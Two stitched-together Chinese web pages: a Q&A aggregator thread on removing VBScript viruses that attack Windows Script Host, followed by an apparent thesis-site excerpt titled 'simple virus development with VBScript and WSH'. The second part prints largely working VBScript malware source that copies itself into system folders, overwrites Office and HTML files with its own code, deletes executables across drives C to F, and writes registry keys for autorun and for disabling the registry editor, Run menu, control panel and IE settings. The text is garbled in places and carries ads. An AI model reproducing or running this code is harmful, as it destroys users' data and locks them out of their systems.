电脑出现脚本宿主主

Windows脚本宿主-学网-中国IT综合门户网站-提供健康,养生,留学,移民,创业,汽车等信息
> 信息中心 >
Windows脚本宿主
来源:互联网 发表时间: 14:32:40 责任编辑:王亮字体:
为了帮助网友解决“Windows脚本宿主”相关的问题,学网通过互联网对“Windows脚本宿主”相关的解决方案进行了整理,用户详细问题包括:RT,我想知道:Windows脚本宿主,具体解决方案如下:解决方案1:
个是由于你之前中了暴风一号这个病毒。由于360安全卫士会恶意拦截金山网盾的***,需要对系统进行修复。百度搜索一下金山U盘专杀这个软件,之后根据提示下载金山网盾进行其他病毒的处理,所以需要先卸载360安全卫士,因为一般你还会同时中了其他病毒,可以很好的处理这个暴风病毒同时修复病毒造成的破坏
解决方案2:
***已发到窗口右上方“我的消息”里。挺管用的。 -------有人盗用*** ,需要使用一些工具来修复,请使用,也可考虑系统还原一下(选好还原点),无奈只好用这种方式! 完后那是系统或程序出了问题,请理解,效果不好的话
解决方案3:
搜索一下:无法找到windows/... .vbs的脚本引擎VBScript,修复方法
解决方案4:后缀名是不是vbs ?是vbs病毒!进入安全模式,在运行中输入MSConfig,到启动选项卡,把和VBS有关的全部取消然后显示所有文件包括系统文件,搜索所有VBS拓展名的文件,以及每个分区下的autorun.inf文件,全部删除。常见的VBS病毒一、查杀此毒的关键是禁止c:\WINDOWS\system32\wscript.exe运行。wscript.exe是系统程序,不是病毒。但它是此毒运行的必要条件。 禁止wscript.exe的办法有: 1、在“软件限制策略”中禁掉c:\WINDOWS\system32\wscript.exe(图1) 2、将I386、dllcache、system32三个文件夹中wscript.exe的后缀去掉。这时,“windows文件保护”机制被触发,用户会收到系统报警:windows系统文件被替换为不可识别的版本。不必理会(因为这是用户去除wscript.exe后缀的结果)。在提示对话框中分别点击“取消”、“是”。 只要上述任何一种操作成功,便打断了此毒“连环套”式的感染环节,病毒主体无法运行(图2)。 二、结束c:\WINDOWS\system32\wscript.exe进程。 三、用IceSword找到并删除下列病毒文件: c:\windows\.vbe c:\windows\system32\.vbe C:\Documents and Settings\All Users\「开始」菜单\程序\启动\.vbs 四、删除病毒添加的注册表内容: 展开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 删除: &LENOVO-CE316418&&.vbe& [] 注1:这个服务名是病毒拷贝的本地计算机名。不同的电脑,此名不同。 注2:如果是采用第二种办法禁wscript.exe,杀完毒后,请恢复I386、dllcache、system32三个文件夹中wscript的后缀。
相关文章:
最新添加资讯
24小时热门资讯
Copyright © 2004- All Rights Reserved. 学网 版权所有
京ICP备号-1 京公网安备02号当前位置:
基于VBScript和Windows脚本宿主的一种简单病毒开发
来源: 联系QQ: 作者: 佚名 来源: 网络 发布时间: 13/05/06
文章导读:在新的一年中,各位网友都进入紧张的或是工作阶段。的各位小编整理了其他类别-基于Script和Windows脚本宿主的一种简单病毒开发的相关内容供大家参考,祝大家在新的一年里工作和学习顺利!***咨询,网竭诚为您服务,本站永久域名: &5.2 功能流程图脚本病毒程序流程:首先是初始化工作及创建主函数过程,其次是搜索文件,选择某一文件并判断感染条件,如果已经感染,则结束感染破坏文件模块,并选择下一文件。如果未感染,则执行感染破坏文件模块,再选择下一文件。并使用递归算法调用搜索文件模块本身,对子文件夹进行操作。对磁盘,文件感染破坏操作完成后,执行表修改操作,最后结束。如图1所示5.3 设计思路1.初始化部分:定义相关全局变量。2.主函数部分:使用系统文件操作(FSO)对象来对各个文件进行操作,调用scan过程,磁盘遍历过程,注册表操作过程。3.文件搜索部分:使用系统文件操作对象,通过调用getfolder方法,得到路径下的文件,再用递归算法,调用过程本身,实现对自文件夹的访问。4.文件破坏部分:判断文件后缀,如果符合条件,执行删除操作。5.文件感染部分:如果文件未感染,则将脚本病毒自身代码覆盖源文件,实现对目标文件的感染。6.注册表操作部分:创建注册表键值修改过程,再调用该过程对注册表进行修改操作。5.4 功能模块实现5.4.1主函数模块该模块主要用到的对象:CreateObject对象&&&&&&&&&& 创建注册表对象该模块主要用到的方法:RegRead 方法&&&&&&&&&&&&&& 读注册表键值Regcreate 方法&&&&&& &&&&&&&创建注册表键值&代码解析:主函数模块首先创建了对注册表操作的对象,再调用regread方法和regcreate方法,对执行VBScript脚本的Windows脚本宿主进行超时设置,加入防止操作超时的操作。然后将病毒文件复制到windows目录和system32目录下备份。再调用感染文件模块,破坏文件模块,注册表操作模块。关键代码如下:main()sub main()On Error Resume Nextdim wscr,rrset wscr=CreateObject(&WScript.Shell&)rr=wscr.RegRead(&HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout&)if (rr&=1) then wscr.regcreate&HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout&, 0 ,®_DWORD&''注释 - 防止操作超时造成的终止。end if&Set dirwin = fso.GetSpecialFolder(0)Set dirsystem = fso.GetSpecialFolder(1)Set dirtemp = fso.GetSpecialFolder(2)''获取系统关键文件夹的名称&Set c = fso.GetFile(WScript.ScriptFullName)c.Copy(dirsystem&&\MSKernel32.vbs&)c.Copy(dirwin&&\Win32DLL.vbs&)c.Copy(dirsystem&&\raul.TXT.vbs&)''复制自身到关键目录中备用。m = msgbox(&The virus is scanning!&,0,&raul-virus&)&&& ''弹出警告窗口,病毒正在执行搜索功能scan(&C: &)m = msgbox(&The virus is deleting your file!&,0,&raul-virus&)delete(&C: &)scan(&D: &)delete(&D: &)scan(&E: &)delete(&E: &)scan(&F: &)delete(&F: &)regruns()end sub5.4.2感染文件模块该模块主要用到的对象:Filesystemobject对象&&& &系统文件操作对象Files 对象&&&&&&&&&&&&&& 文件夹中所有文件的集合该模块主要用到的方法:GetFolder 方法&&&&&&&&&& 返回指定的文件夹对象Getextensionname 方法&&& 返回包含文件扩展名的字符串Opentextfile 方法&&&&&&& &打开指定的文件GetBaseName 方法&& &&&&&返回文件的基本名GetFile 方法&&&&&&&&&&&&& 返回指定的文件Write 方法&&&&&&&&&&&&&& 将指定内容写入字符串Copy 方法&&&&&&&&&&&&&& 复制指定的文件代码解析:脚本病毒可以直接通过复制自身代码来感染文件。病毒中的绝大部分代码都可以直接加在另一中间。以下这部分代码就是感染文件模块的关键代码:1.首先定义系统文件操作fso。2.然后调用opentextfile方法打开一个文件,并将该文件复制给raul对象。3.判断文件名后缀,如果是html,htm,xls,vbs,doc,ppt,则调用write方法,将满足上述后缀名的文件打开,并将病毒自身代码写入文件,实现感染操作。4.之后调用getbasename方法得到要感染的文件的名称。5.再将这个字符串覆盖写到源目标文件,并创建一个以源目标文件名为文件名前缀、以&vbs&为后缀的新文件。6.最后删除源目标文件。&关键代码如下:dim file,fc,raul,anameset fso = wscript.createobject(&scripting.filesystemobject&)&&& set folder = fso.getfolder(lujing)&&& set fc = folder.Filesext=fso.getextensionname(file.path)ext=lcase(ext)&if(ext=&html&)or(ext=&htm&)or(ext=&xls&)or(ext=&vbs&)or(ext=&doc&)or(ext=&ppt&)thenset raul=fso.OpenTextFile(f1.path,2,true)raul.write vbscopyraul.closeaname=fso.GetBaseName(f1.path)set cop=fso.GetFile(f1.path)cop.copy(lujing &&\&&aname&&.vbs&)5.4.3搜索文件模块该模块主要用到的对象:Filesystemobject对象&&& 系统文件操作对象Files对象&&&&&&&&&&&&& &文件夹中所有文件的集合该模块主要用到的方法:Getfolder方法&&&&&&&&& 返回指定路径中的文件夹对象Subfolders属性&&&&&&&& 返回由指定子文件夹组成的文件夹集合&该模块运行截图效果如图2所示:&图2 病毒搜索模块运行截图效果代码解析:1.首先本模块内定义了系统文件操作对象fso。2.然后调用getfolder方法,得到需要搜索的路径(scan过程里面的参数即需要搜索的路径)的那个文件夹,并将该文件夹对象附给变量folder。3.再引用files属性,得到文件夹下面的所有子文件组成的文件集合,并将该对象附给变量fc。4.再通过for循环语句,实现对fc(文件集合)下的所有文件依次进行感染标记判断,破坏,感染等操作。5.接下来引用subfolders属性,将子文件夹集合这个对象附给变量sf。6.通过for循环语句,并且调用scan过程(递归算法),该递归算法能够遍历整个分区的目录和文件。实现对sf(文件集合)下所有文件的依次操作。从而达到搜索整个文件夹的目的。&关键代码如下:Sub scan (lujing)On error resume nextDim file,fcSet fso = wscript.createobject(&scripting.filesystemobject&)Set folder = fso.getfolder(lujing)Set fc = folder.filesFor each file in fc&/*脚本病毒感染及删除模块语句*/&NextSet sf = folder.subfoldersFor each file in sfScan(file)NextEnd sub5.4.4破坏模块该模块主要用到的对象:Filesystemobject对象&&& 系统文件操作对象Files对象&&&&&&&&&&&&& 文件夹中所有文件的集合该模块主要用到的方法:Deletefile方法&&&&&&&&& 删除指定的文件&该模块运行截图效果如图3所示:&&&&图3 病毒破坏模块运行截图效果代码解析:1.首先定义系统文件操作fso。2.调用getfolder方法,得到指定路径下的文件夹。3.对于文件夹下的每一个文件判断文件名后缀,如果是exe,com,bat,则调用deletefile方法,将满足上述文件名后缀的文件直接删除,实现破坏功能。&关键代码如下:Sub delete (lujing)On error resume nextDim file,fcSet fso = wscript.createobject(&scripting.filesystemobject&)Set folder = fso.getfolder(lujing)Set fc = folder.filesFor each file in fcif (ext=&exe&) or (ext=&com&) or (ext=&bat&) thenfso.deletefile(file.path)&NextEnd sub5.4.5注册表操作模块该模块主要用到的函数:CreateObject函数&&&&&& &创建注册表对象该模块主要用到的方法:Regwrite方法&&&&&&&&&&& 对指定的注册表项写入值代码解析:1.该模块首先定义了创建注册表键值过程。调用createobject函数创建了注册表修改对象。调用regwrite方法,写入注册表的键值。2.在regruns过程中调用了regcreate过程,执行禁止运行菜单,禁止关闭系统菜单,开机自动运行等操作,以及对IE修改的操作。关键代码如下:sub regcreate(regkey,regvalue)Set regedit = CreateObject(&WScript.Shell&)regedit.RegWrite regkey,regvalueend sub&sub regruns()regcreate&HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun&,1,®_DWORD&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&''禁止运行菜单regcreate&HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose&,1,®_DWORD&&&&&&&&&&&&&&& &&&&&&&&&&&&''禁止关闭系统菜单regcreate&HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives&,,®_DWORD&&&&&&&&&& &&&&&&&&&&&&&&&&&''隐藏盘符regcreate&HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools&,1,®_DWORD&&&&& &&&&&&&&&''禁止使用注册表编辑器regcreate&HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry&,1,®_DWORD&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&''禁止使用注册表扫描regcreate&HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff&,1,®_DWORD&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&''禁止注销菜单regcreate&HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system&,&Win32system.vbs&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&''开机自动运行regcreate&HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop&,1,®_DWORD&&&&& &&&&&&&&&&&&&&&&''禁止显示桌面所有图标regcreate&HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled&,1,®_DWORD&&&&&&&&&&& &&&&&&&&&&&&&&&&&&&&&&''禁止dosregcreate&HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar&,1,®_DWORD&&&&&&&&& &&&&&&&&&&&&&''禁止任务栏和开始regcreate&HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu&,1,®_DWORD&&&&&&& &&&&&&&&&&&&&''禁止右键菜单regcreate&HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders&,1,®_DWORD&&&& &&&&&&&&&&&&&&&&&&&&&&&''禁止控制面板regcreate&HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption&,&kkhk&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&''开机对话提示框标题regcreate&HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText&,&ij&&& &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&''开机对话提示框内容''下面是相关IE操作regcreate&HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoBrowserContextMenu&,1,®_DWORD&&&&&&&&&&&&&&&&&&&& 禁止IE右键菜单regcreate&HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoBrowserOptions&,1,®_DWORD&&&&&&&&&&&&&&&&&&&&&&&&& 禁止Internet选项regcreate&HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoBrowserSaveAs&,1,®_DWORD&&&&&&&&&&&&&&&&&&&&&&&&&& 禁用另存为菜单regcreate&HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoFileOpen&,1,®_DWORD&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 禁用文件打开菜单regcreate&HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\Cache Internet&,1,®_DWORD&&&&&&&&&&&&&&&&&&&&&& 禁止更改临时文件设置regcreate&HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\AutoConfig&,1,®_DWORD&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 禁止更改自动配置regcreate&HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\HomePage&,1,®_DWORD&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&禁止更改主页regcreate&HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\History&,1,®_DWORD&&&&&&&&&&&&&&& &&&&&&&&&&&&&禁止更改历史记录设置regcreate&HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoViewSource&,1,®_DWORD&&&&&&&&&&&&&&&&&&&&&&&&&&&& 禁止查看源文件regcreate&HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\SecurityTab&,1,®_DWORD&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 禁止安全项end sub本站发布的毕业设计均是完整无错的***作品,包含开题报告++论文+源代码+翻译+答辩稿PPT
本文选自毕业设计论文文章部分只是部分简介,如需了解更多详情请咨询本站***!QQ3710167
上一篇资讯:
下一篇资讯:
文章排行榜查找C:\WINDOWS\system32\.vbe 下面的这个文件,并将其删除.同时检查启动项中的内容,看看有关.vbe的启动内容并将其删除
附近的朋友等待您的帮助
包打听移动版

参考资料

 

随机推荐